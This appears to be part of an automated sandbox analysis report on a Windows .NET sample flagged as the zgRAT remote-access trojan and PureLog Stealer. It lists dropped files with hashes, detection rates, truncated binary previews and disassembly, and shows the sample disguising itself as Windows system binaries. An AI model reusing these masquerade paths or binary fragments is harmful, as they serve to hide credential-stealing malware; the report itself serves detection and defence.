                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                C:\Users\user\Desktop\cflUKPKy.log

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):69632
                                                                                                                                Entropy (8bit):5.932541123129161
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                                                MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                                                SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                                                SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                                                SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                                                                                C:\Users\user\Desktop\maoHSLGQ.log

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\Desktop\Udzp7lL5ns.exe
                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):9728
                                                                                                                                Entropy (8bit):5.0168086460579095
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:b2+4Af/qPl98sgn8VenjzRR0xXzhZ7BiCTUk9v2G6/7jK6XsBG7hWuP9LfqpW0RQ:gCU8XKb7BDUieGi3jcBgLyB+b
                                                                                                                                MD5:69546E20149FE5633BCBA413DC3DC964
                                                                                                                                SHA1:29FEB42AB8B563FAFACFD27FAE48D4019A4CBCC2
                                                                                                                                SHA-256:B48CA16B9BA2B44BF13051705B8E12D587D80262F57F7B2595AD1DD7854A86C6
                                                                                                                                SHA-512:90D5F6C334B8064ED6DD002B03C57CEBBFAC1620D6CB2B79103DB0369D3A4FD82DB092E675F387AB0BDFE20303D9AC37F4E150896FC333E6F83B00269F012236
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e...........!.................=... ...@....... ....................................@..................................<..W....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......$..............@..B.................=......H.......<&.............................................................................................................*V...}................*.*.0..C.......(....o.......(....(....o.......(....s......(...........o....o.....*..0..'.......s.......(....o.....o........,..o......*..................0.............{........&.r...p.{....r;..p(....}.....s....}.....{........[.{.....{....o....(....s....rQ..po.....{.....{....o....(....s....ra..po......{....s....}.....{..........+.{.....{..

                                                                                                                                C:\Users\user\Desktop\wJHXBnLy.log

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\Desktop\Udzp7lL5ns.exe
                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):69632
                                                                                                                                Entropy (8bit):5.932541123129161
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                                                MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                                                SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                                                SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                                                SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                                                                                C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\6dd19aba3e2428

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\Desktop\Udzp7lL5ns.exe
                                                                                                                                File Type:ASCII text, with very long lines (727), with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):727
                                                                                                                                Entropy (8bit):5.899734048709991
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:72sIKm8pnySN8uEGHoKucEiAoKOF9CzZu1Z4DMn9uPlUheJA9f/q/Hh7j:7HIZ8UUnvEiAdqCtu1Z44nFeafivh3
                                                                                                                                MD5:8DAE68FB36D57C22B170D898CB541FC1
                                                                                                                                SHA1:5DC658293A1489DEEB0B791746DC8C44DF7BED39
                                                                                                                                SHA-256:0D16A84F5C273DDEBBA8E566234696190C43B881A0F7D297BD5D0955F14A1BD7
                                                                                                                                SHA-512:BF97712834C0CB508C90547D7478D0B99C8C503FA17D78901D415B89EF70E5DB788748BE648C3006F4DB8EC852F0A8C298FA91212F0378B10793BDE269337E6B
                                                                                                                                Malicious:false
                                                                                                                                Preview:QY1Teu6NQF8WsdGRadJwRw4kTjqfKlqQZarsm4WPo3ZnZqWjOrb4OgbedQ94EbCoYs6SvXpgH4HYXRKnMGRdJwB28NPV4bKN0uPrtDx0C5wTZDGMGWr7KjelqEUiIUlqt4hnCd3JTabOAsc5GDPitNDQPnAptPssTGkffdJnciotIQl8lYbFED6g0RXYcNZEst43H7Zn3lFKiTI9CCEUxmnQJEoOGuKOJkBYVr0n9yMc7w7hIYWZJEQFGouDSLgIb0B8RtnVLaV9aKSXHHFrYvFET6Sr7xVxRDBHv8PYuBOtsQo6VW6LFztqv6pUb6XXFisXILmI1q7XgVVCSWVk1JrcTVVyT47yn0oKiQxKuxTY1WJakmCElxg50QDwzxz6tJuqqLeBiK0E0Sk7M5Or22MzUtUSNBV68WpslctZHAgb7cFhpGk3jIE064W70Myhz3Gdn2VtMyj1Wv22owmGabWzSzvqGvi4M9lDVl4xu0rviMdLCeTEkrGXgQKxGombPopXJygC1zVkulRFVkomceUe3OhFaGqGOQf3hGBO7QMvWgn59EcgAA8vUKe5RalvIPVeGXiOiaoLSjIWkmGVoJGNRtjWmG6hobmGKJylgN7kVxdvCHUpTQG8JIMWxLmcdGg06BMbxfzbLg1dQyUfvRNYUn7C6cxUkfGPQmyA431yapwnQsF91HrL3IgSEKfVre0qZmNo9Uk2ZY7p0UvNWyc

                                                                                                                                C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exe

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\Desktop\Udzp7lL5ns.exe
                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1933824
                                                                                                                                Entropy (8bit):7.542672428749591
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24576:wwkCsYsgFFuqj/oBxyALwMosh651ZBvISmXqD0Z+rtyumwwI3PXGSfaeiLUb+7xE:B5kBTXYD3Yo0ZKy7IfXGfLU67x6sg
                                                                                                                                MD5:3614F4C4B137E627F03D0118F4779D52
                                                                                                                                SHA1:07120124F394EDDB46C3C2A985063718D17FC48D
                                                                                                                                SHA-256:4ACC21CE239F8EADCA573C53B92CC49B96A9D7B96F7CFE4A5511847148839A2A
                                                                                                                                SHA-512:BFC1CB74B69F1BC0E47EEFEE7614760EDFE068AC9471ED211A87D4B1A47F8F2E784DB2BEB79B23988BA7810D525EB2463F75EACF0DF9F560A2D2E0E52A0E7C7F
                                                                                                                                Malicious:true
                                                                                                                                Yara Hits:
                                                                                                                                • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exe, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exe, Author: Joe Security
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 66%
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;xg.................z..........>.... ........@.. ....................................@....................................K....... ............................................................................ ............... ..H............text...Dx... ...z.................. ..`.rsrc... ............|..............@....reloc..............................@..B................ .......H......................|......f........................................0..........(.... ........8........E................=...8....(.... ........8....*(.... ....~....{....:....& ....8....(.... ....~....{....:....& ....8........0..<....... ........8........E........t.......P...............8....~....(O... .... .... ....s....~....(S....... ....~....{w...9....& ....8....8.... ....~....{....9v...& ....8k.......~....(W...~....([... ....<3... ....8?...~....9:... ....~....{....9!..

                                                                                                                                C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exe:Zone.Identifier

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\Desktop\Udzp7lL5ns.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):26
                                                                                                                                Entropy (8bit):3.95006375643621
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                Malicious:false
                                                                                                                                Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:JSON data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):55
                                                                                                                                Entropy (8bit):4.306461250274409
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                Malicious:false
                                                                                                                                Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                                                C:\Windows\System32\CSC98778A6FB9344578AD1F444CFDF09EF9.TMP

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                File Type:MSVC .res
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1224
                                                                                                                                Entropy (8bit):4.435108676655666
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                                                                                                                                MD5:931E1E72E561761F8A74F57989D1EA0A
                                                                                                                                SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                                                                                                                                SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                                                                                                                                SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                                                                                                                                Malicious:false
                                                                                                                                Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi

                                                                                                                                C:\Windows\System32\SecurityHealthSystray.exe

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):4608
                                                                                                                                Entropy (8bit):3.9672535012868213
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:6apLPtyM7Jt8Bs3FJsdcV4MKe27VdEd8IvqBHuOulajfqXSfbNtm:xPxPc+Vx9MQvkIcjRzNt
                                                                                                                                MD5:1CD2C610097A7CAF73C59F058B8B22D8
                                                                                                                                SHA1:48B99DAF6DDBEA7C1EBB0EF15CD6B1059381D775
                                                                                                                                SHA-256:B77968DA34FB2185D49ED71E2831D96BB4B8FAA5770EEAB7DE9F89DC7E8EA73A
                                                                                                                                SHA-512:E833D8C95590146DE5A7DE5DC588991D13E568622FBB0D21793B2D797B5D06BCA37FBC77C2DF58FFABE5A79489327785BA03CCE27791EBB956D98195E6600B4E
                                                                                                                                Malicious:true
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.............................'... ...@....@.. ....................................@.................................l'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..D.............................................................(....*.0..!.......r...pre..p.{....(....(....&..&..*....................0..........ri..p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.........#GUID...$... ...#Blob...........WU........%3................................................................

                                                                                                                                C:\Windows\SystemTemp\Crashpad\reports\46422b70bfe73b

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\Desktop\Udzp7lL5ns.exe
                                                                                                                                File Type:ASCII text, with very long lines (453), with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):453
                                                                                                                                Entropy (8bit):5.831514523194334
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:hA0fGXbRRnM+VCEMGwVuQwL3HVYhgnn1Vzc5jad7:hYbRu+V+fc93HmmnPQ5ad
                                                                                                                                MD5:1A97536961988E663E21E5DB0CEC474B
                                                                                                                                SHA1:67EE0E4429ECAA292F6DFAA0BCD04D8C0BC6A72F
                                                                                                                                SHA-256:F8C06D0FAE9D649EBE7A78E307AE934382793C6BD6D924E0FAA271FFCD18A606
                                                                                                                                SHA-512:634F26F2213492CBF235F200504EE297937C4770D1F85012106D4504C2568D542CCF3B6503C5CBF54BCEDF8BFD8E04CA6B7061895F2BD5119B6F2E781EE8ED60
                                                                                                                                Malicious:false
                                                                                                                                Preview:so0ud0PsFAlQH340pmYvBq3eKxPteJZW6emFQVzVJzdZwhOMeDDPOAaBvWkpkfO5kOUmQyjTxClMNdrmjDOaFKI5ElU4vJvnlhzhMl5petbLYNyRo7GgQxzaGYhpeoioQ7lpoJa7Ii6Vs6h0wCPxCPWxrYbyEPLzLx5amJnfhJYs1erJ1q3bYulBlx7Psm22XGK4BGNmZuQ30o6NqR6YWtabM3zzMXw5QfUvTxIucQCodrK61tjapegnptsHRYaB7VnVTL43IL5Frw7et28cyWPv9qFkEBdE0AqIEzmqzpSdja62vOYYa7NlF1VmFTzHr1PqGzZ3QRnJEvMjuMyzmFn2xECNd9kfzKvrKQw6yeIIUEhUow22e9emNX2BwMZQqHT39eYea2AH7ehtgsirHsA0pJewXvJmF1bMuoUKXYbm8Wpt0JeEosJ8GdN0AlGpsYCFC

                                                                                                                                C:\Windows\SystemTemp\Crashpad\reports\LaHYItspByFGQiJUMBgDGadp.exe

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\Desktop\Udzp7lL5ns.exe
                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1933824
                                                                                                                                Entropy (8bit):7.542672428749591
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24576:wwkCsYsgFFuqj/oBxyALwMosh651ZBvISmXqD0Z+rtyumwwI3PXGSfaeiLUb+7xE:B5kBTXYD3Yo0ZKy7IfXGfLU67x6sg
                                                                                                                                MD5:3614F4C4B137E627F03D0118F4779D52
                                                                                                                                SHA1:07120124F394EDDB46C3C2A985063718D17FC48D
                                                                                                                                SHA-256:4ACC21CE239F8EADCA573C53B92CC49B96A9D7B96F7CFE4A5511847148839A2A
                                                                                                                                SHA-512:BFC1CB74B69F1BC0E47EEFEE7614760EDFE068AC9471ED211A87D4B1A47F8F2E784DB2BEB79B23988BA7810D525EB2463F75EACF0DF9F560A2D2E0E52A0E7C7F
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 66%
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;xg.................z..........>.... ........@.. ....................................@....................................K....... ............................................................................ ............... ..H............text...Dx... ...z.................. ..`.rsrc... ............|..............@....reloc..............................@..B................ .......H......................|......f........................................0..........(.... ........8........E................=...8....(.... ........8....*(.... ....~....{....:....& ....8....(.... ....~....{....:....& ....8........0..<....... ........8........E........t.......P...............8....~....(O... .... .... ....s....~....(S....... ....~....{w...9....& ....8....8.... ....~....{....9v...& ....8k.......~....(W...~....([... ....<3... ....8?...~....9:... ....~....{....9!..

                                                                                                                                C:\Windows\SystemTemp\Crashpad\reports\LaHYItspByFGQiJUMBgDGadp.exe:Zone.Identifier

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\Desktop\Udzp7lL5ns.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):26
                                                                                                                                Entropy (8bit):3.95006375643621
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                Malicious:false
                                                                                                                                Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                \Device\Null

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\PING.EXE
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):502
                                                                                                                                Entropy (8bit):4.621947447102293
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:PdLw5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:UdUOAokItULVDv
                                                                                                                                MD5:6127AFE1BD2D6EAAA8E621F0C1D968EA
                                                                                                                                SHA1:CBC6C094509451FA0D5D70134C19278EFD19E533
                                                                                                                                SHA-256:B481F0C9B033413DCA46C39DFF77AD83FB49C91778EDA22B3CB40BC3916C3FC3
                                                                                                                                SHA-512:71F62375298D68B99E4981563D0B8FEA835CD2BA78A856C32C6452E8D7FBEDBAE30E2EACBD56D266DC25A80BF95EEA691F5A6771CA8CBB467680F3BD1F854399
                                                                                                                                Malicious:false
                                                                                                                                Preview:..Pinging 760639 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..

                                                                                                                                Static File Info

                                                                                                                                General

                                                                                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                Entropy (8bit):7.542672428749591
                                                                                                                                TrID:
                                                                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                                                • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                • Windows Screen Saver (13104/52) 0.07%
                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                File name:Udzp7lL5ns.exe
                                                                                                                                File size:1'933'824 bytes
                                                                                                                                MD5:3614f4c4b137e627f03d0118f4779d52
                                                                                                                                SHA1:07120124f394eddb46c3c2a985063718d17fc48d
                                                                                                                                SHA256:4acc21ce239f8eadca573c53b92cc49b96a9d7b96f7cfe4a5511847148839a2a
                                                                                                                                SHA512:bfc1cb74b69f1bc0e47eefee7614760edfe068ac9471ed211a87d4b1a47f8f2e784db2beb79b23988ba7810d525eb2463f75eacf0df9f560a2d2e0e52a0e7c7f
                                                                                                                                SSDEEP:24576:wwkCsYsgFFuqj/oBxyALwMosh651ZBvISmXqD0Z+rtyumwwI3PXGSfaeiLUb+7xE:B5kBTXYD3Yo0ZKy7IfXGfLU67x6sg
                                                                                                                                TLSH:1595AE16A5928E32D3B85B358657013E8290E7663612EB0B365F10D3AE17BF19F721F3
                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;xg.................z..........>.... ........@.. ....................................@................................

                                                                                                                                File Icon

                                                                                                                                Icon Hash:00928e8e8686b000

                                                                                                                                Static PE Info

                                                                                                                                General

                                                                                                                                Entrypoint:0x5d983e
                                                                                                                                Entrypoint Section:.text
                                                                                                                                Digitally signed:false
                                                                                                                                Imagebase:0x400000
                                                                                                                                Subsystem:windows gui
                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                Time Stamp:0x67783BFD [Fri Jan 3 19:35:25 2025 UTC]
                                                                                                                                TLS Callbacks:
                                                                                                                                CLR (.Net) Version:
                                                                                                                                OS Version Major:4
                                                                                                                                OS Version Minor:0
                                                                                                                                File Version Major:4
                                                                                                                                File Version Minor:0
                                                                                                                                Subsystem Version Major:4
                                                                                                                                Subsystem Version Minor:0
                                                                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                Entrypoint Preview

                                                                                                                                Instruction
                                                                                                                                jmp dword ptr [00402000h]
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
